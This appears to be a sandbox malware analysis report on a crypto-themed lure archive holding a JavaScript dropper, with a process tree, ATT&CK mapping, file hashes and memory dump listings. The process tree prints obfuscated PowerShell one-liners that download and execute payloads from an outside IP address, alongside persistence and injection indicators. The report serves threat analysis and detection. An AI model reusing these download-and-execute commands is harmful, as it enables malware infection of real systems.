    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DDEF020457ADF31C975CDC31384EF7D2 --mojo-platform-channel-handle=1860 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:3124

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Elon_Musk_-_Bitcoin_King.zip\Password for PDF.js"
1⤵
PID:3796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://193.233.132.136/a/z.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
  2⤵
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:2384
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Public\0x.log
    3⤵
    PID:3656
  - - C:\Windows\system32\attrib.exe
      attrib +h C:\Users\Public\0x.log
      4⤵
      Views/modifies file attributes
      PID:4312
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:4812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://193.233.132.136/a/s.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:4792
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious behavior: EnumeratesProcesses
    PID:2996
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 512
      4⤵
      Program crash
      PID:2432
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 492
      4⤵
      Program crash
      PID:4456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
4256fdd1267fdd16cdfb12adaa2f3174

SHA1
b85e1f2f9e4f0eb7e9f4418451c9bbb9294f914c

SHA256
9c510881670f5f45b285f25e2ae54b4b51b510f4ba0afb2751ba1dc2abbd4f1a

SHA512
963d86b425b5002365f96c079956f4e2565e5a8ec95a5a4fbe1d860bff9423701a4181d93593d51de9e804f216187dd406b842ffb718386759eed9e4486cdd55

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
885B

MD5
5cc571db1270ce9a7b30db3e9168fa8d

SHA1
9372f60d0905bbaa5b9d9d7a3ce9124df1169b72

SHA256
85d7d8286feb9d17b20e72ece93ad01b1056de810c83d4a235ebbd8cea0f9865

SHA512
8bb459e198519641c1713f6e60d5e229ed914a02dd4205c41d23d1a31e96ac8837eb662f3dc83180b8f7871f7ca2f485058f16d75d9007e3d6ad63b134288d1f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
885B

MD5
de8bafc393c23eaddcee345fc2a8402c

SHA1
7809c07205e0a37280f5cfc63c0e700024e2e3f4

SHA256
9c13f6b8e739075415e1b7c3c32ff2a24b883682a2b0e70e021b987c3fe85f65

SHA512
051c626619c500028e86afe751e1e5ca21e5913549f679ef9f315f9f0ef5cfcbdae4c7c49b565685c7323ceb89e84704741491b869dc5d4667e1287c3703346d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
f6c445e27c95baf9c5cd3aa77eee29e5

SHA1
eddebf741d64908549f1717ca9f4d59843c010e3

SHA256
7c5ed2fccf12ae2731b2c327024f80daae7e90bb4eeb4b4f7e6f8b2e7596d97c

SHA512
38c4a2d569b955b2476c1d3acd1935dc0b70192b23718af69487dd18088d66aea9fb1f07d2c37acaad59f2db001e487d981c483d1c588dac3b20467182928b2a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
20af3607052fcac287f686a7e60d2f06

SHA1
302a20b002e0f3d1e144f2a00b3b28a1dda06ed6

SHA256
707e74664b4d2924698c73856fd6fbb3c3b56b6b7a2ed4fb3a7bad0717a924b7

SHA512
2ce21f2bc5012682fca2a66d39911b6787cba272b0e5d88c95df22ce367ccfdd2fb07c39e460a0fd096d9da7ad759081e40ea3d948f4af33f3a3cae9174a846c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
027a1d5b4a5b0dbdd99e35902aa33fb8

SHA1
9f7ffebc4540c157e9be64b8d8781be4f063c244

SHA256
b4bec89563b125f11b504d2e647ac3d22e27b3eef82481294e99b09f59a956d4

SHA512
d0bff51021a1dff3e849c120a93075bf28ddde79165c0dd4aad9d85c0837c3965c0199d5b069b66f2f671bf354044a5ae3da8a7462120eb124c0c72a9034baa0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
ac85fd639e1c6adc2637abe90ca8a306

SHA1
481907a950614d10b45f987709c65c953f730618

SHA256
0bc404de9852edb2bd18c6b27a9da7f4dd8fb05f06e47139fce32f62f9320999

SHA512
460eb8b4489874471f0008b278c5174dd26e5fe7ee9f62e15e1573111a82c8d38ea309950d8ea2bd4d39223a08cba438a822f2c28f25bb71e3589cd9a17a643a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
254KB

MD5
7dddc890d284bed74a6004f865dfe7ec

SHA1
b52d8278ba961b8ba5403b689aa629c9e57fd071

SHA256
85399d6f15a200f713abc8cda56539812c09818f4b0cc660f54d48cb234732be

SHA512
0bafd4cbd4e235d67c77b7e6ec669428be9e7c607add73e5875b76862297dffd8d27947e1bb0ada163af52ab2bbeb0a6601d6df6525f4faa88d1ec10876af2f3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
254KB

MD5
d953961e722b9767e3ba958e7a7c3d9b

SHA1
f774777d24ddb2dd0062537ab8c86106c070cdb2

SHA256
369be75ab43ab267bd2e81bf2ad775bce402a5a44037a83218915512075d5c08

SHA512
7f9e12fe11aefd64e347a858c3dae7613ba34145c5b914859f2d9ec251eabe35e5178f994e525a87807e873db728e1f80bd8949cd9c88914e2048cf478e45a81

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
110KB

MD5
0832213859b9dc4e210f6973cfa1c263

SHA1
bb6d7e4be59f4080fe0070dfa6927a94c597b96a

SHA256
8dd8ba94f7fc908015e9f74a6bf3c3b5b7f6cca706febb175dae23714a962997

SHA512
7909a09327b0d19b85a813649f855d0d5fc311b988705e9d90871de1d922a1fc162916dbf0ad8528df358aa3cb9575f5b18172e8671250be2daa9615d6c9baad

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe587fe9.TMP

Filesize
94KB

MD5
b54897cf3073a0abb6614eaabd373081

SHA1
c8e00ac1c440614957e8d3b914b4404e151e55ad

SHA256
a5cfaabc683cb27c1a04cf13b9defbb404a44083b022e82e84b162b25f45674c

SHA512
088f933e2a8bad96aa3e33a6fbf0c9812bf33247003e30863d86881f42ff62e3b61fec7413f7b1f80426b82a3980d9e7315baad599de480336ae29462b676ce9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f11207cbcbb5290744204f80009d3aac

SHA1
675f45c2f26f7a094a1d4ad2ac97cc361cdcd8cb

SHA256
5c3056b9ffae884844f6a9a5d10bcc08d13ab3976ed885597ee3b0728a271248

SHA512
03b235bd5855d42edc45b39caf8409d0628d5c3f07277154cb9562444cd9e2d7597a01e49a61be21d6bcc5d120cd25a87cdb1ef1597e9f946eb2362871128129

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mzscjrw2.vor.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Downloads\Elon_Musk_-_Bitcoin_King.zip.crdownload

Filesize
196KB

MD5
f2cf511c816f13b810c41a177d09a5c4

SHA1
a1d31fccb993eb5d25659a14676165e723702878

SHA256
c33e5fe798e6eda1bcbd35b3ac9d5b0b298c199d6bf894d19e453d3a5e647e8c

SHA512
701219d08d41433c09c96e4ce5ed30f49aff1d48d8966fa4cf50140f3bbe0d3b1b806d66e1cb6f4d93bac567c9529a9c646c418ba0d4c95d671e15d059d5bc4f

Download Submit
C:\Users\Public\0x.log

Filesize
62KB

MD5
34d6b90b676cf2fe59153c0c01b59278

SHA1
396c2789cf583c24b047976dc91584aa703c067a

SHA256
acec28de93d3ea0afc8d7101cadc56f07ef03492d1b398769c2d20e358b3b846

SHA512
f20cfcd266b691c70f530b92244dd80eddbd5a5c19d1c08bd6b330ff15217e8fef5ca221adabdc75fc2ac1cb4aae8e729073fe85e13c43a89f5cb56c0310af2f

Download Submit
\??\pipe\crashpad_480_THXHAFQQZYRNKAXC

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1732-373-0x00007FF9C2BE0000-0x00007FF9C2DBB000-memory.dmp

Filesize
1.9MB

Download
memory/1732-372-0x0000000004170000-0x0000000004570000-memory.dmp

Filesize
4.0MB

Download
memory/1732-375-0x00000000744E0000-0x00000000746A2000-memory.dmp

Filesize
1.8MB

Download
memory/1732-371-0x0000000004170000-0x0000000004570000-memory.dmp

Filesize
4.0MB

Download
memory/1732-378-0x00007FF9C2BE0000-0x00007FF9C2DBB000-memory.dmp

Filesize
1.9MB

Download
memory/1732-369-0x00000000001E0000-0x00000000001E9000-memory.dmp

Filesize
36KB

Download
memory/1732-380-0x0000000004170000-0x0000000004570000-memory.dmp

Filesize
4.0MB

Download
memory/1732-377-0x0000000004170000-0x0000000004570000-memory.dmp

Filesize
4.0MB

Download
memory/2384-386-0x0000023A10390000-0x0000023A103A0000-memory.dmp

Filesize
64KB

Download
memory/2384-384-0x0000023A10390000-0x0000023A103A0000-memory.dmp

Filesize
64KB

Download
memory/2384-382-0x0000023A10390000-0x0000023A103A0000-memory.dmp

Filesize
64KB

Download
memory/2384-338-0x0000023A10390000-0x0000023A103A0000-memory.dmp

Filesize
64KB

Download
memory/2384-285-0x00007FF9A4860000-0x00007FF9A524C000-memory.dmp

Filesize
9.9MB

Download
memory/2384-394-0x00007FF9A4860000-0x00007FF9A524C000-memory.dmp

Filesize
9.9MB

Download
memory/2384-383-0x0000023A10390000-0x0000023A103A0000-memory.dmp

Filesize
64KB

Download
memory/2384-309-0x0000023A28DF0000-0x0000023A28E66000-memory.dmp

Filesize
472KB

Download
memory/2384-376-0x00007FF9A4860000-0x00007FF9A524C000-memory.dmp

Filesize
9.9MB

Download
memory/2384-291-0x0000023A10390000-0x0000023A103A0000-memory.dmp

Filesize
64KB

Download
memory/2384-292-0x0000023A10390000-0x0000023A103A0000-memory.dmp

Filesize
64KB

Download
memory/2384-295-0x0000023A10440000-0x0000023A10450000-memory.dmp

Filesize
64KB

Download
memory/2996-355-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/2996-365-0x00007FF9C2BE0000-0x00007FF9C2DBB000-memory.dmp

Filesize
1.9MB

Download
memory/2996-368-0x00000000744E0000-0x00000000746A2000-memory.dmp

Filesize
1.8MB

Download
memory/2996-366-0x0000000003C50000-0x0000000004050000-memory.dmp

Filesize
4.0MB

Download
memory/2996-363-0x0000000003C50000-0x0000000004050000-memory.dmp

Filesize
4.0MB

Download
memory/2996-364-0x0000000003C50000-0x0000000004050000-memory.dmp

Filesize
4.0MB

Download
memory/2996-362-0x0000000003C50000-0x0000000004050000-memory.dmp

Filesize
4.0MB

Download
memory/2996-359-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/2996-379-0x0000000003C50000-0x0000000004050000-memory.dmp

Filesize
4.0MB

Download
memory/2996-352-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/4792-287-0x00007FF9A4860000-0x00007FF9A524C000-memory.dmp

Filesize
9.9MB

Download
memory/4792-288-0x000002CFC8610000-0x000002CFC8620000-memory.dmp

Filesize
64KB

Download
memory/4792-353-0x000002CFC8610000-0x000002CFC8620000-memory.dmp

Filesize
64KB

Download
memory/4792-351-0x000002CFC8500000-0x000002CFC8512000-memory.dmp

Filesize
72KB

Download
memory/4792-350-0x000002CFC8980000-0x000002CFC8994000-memory.dmp

Filesize
80KB

Download
memory/4792-341-0x000002CFC8610000-0x000002CFC8620000-memory.dmp

Filesize
64KB

Download
memory/4792-306-0x000002CFC8820000-0x000002CFC8920000-memory.dmp

Filesize
1024KB

Download
memory/4792-360-0x00007FF9A4860000-0x00007FF9A524C000-memory.dmp

Filesize
9.9MB

Download
memory/4792-296-0x000002CFC8510000-0x000002CFC8532000-memory.dmp

Filesize
136KB

Download
memory/4792-293-0x000002CFC8610000-0x000002CFC8620000-memory.dmp

Filesize
64KB

Download
memory/4792-294-0x000002CFC8550000-0x000002CFC85D2000-memory.dmp

Filesize
520KB

Download
memory/4812-388-0x0000000000400000-0x00000000007D2000-memory.dmp

Filesize
3.8MB

Download
memory/4812-387-0x0000000000400000-0x00000000007D2000-memory.dmp

Filesize
3.8MB

Download
memory/4812-385-0x0000000000400000-0x00000000007D2000-memory.dmp

Filesize
3.8MB

Download
memory/4812-395-0x0000000000400000-0x00000000007D2000-memory.dmp

Filesize
3.8MB

Download
memory/4812-396-0x0000000000400000-0x00000000007D2000-memory.dmp

Filesize
3.8MB

Download
memory/4812-397-0x00000000736A0000-0x00000000736DA000-memory.dmp

Filesize
232KB

Download
memory/4812-398-0x0000000000400000-0x00000000007D2000-memory.dmp

Filesize
3.8MB

Download
memory/4812-399-0x0000000000400000-0x00000000007D2000-memory.dmp

Filesize
3.8MB

Download
memory/4812-400-0x0000000000400000-0x00000000007D2000-memory.dmp

Filesize
3.8MB

Download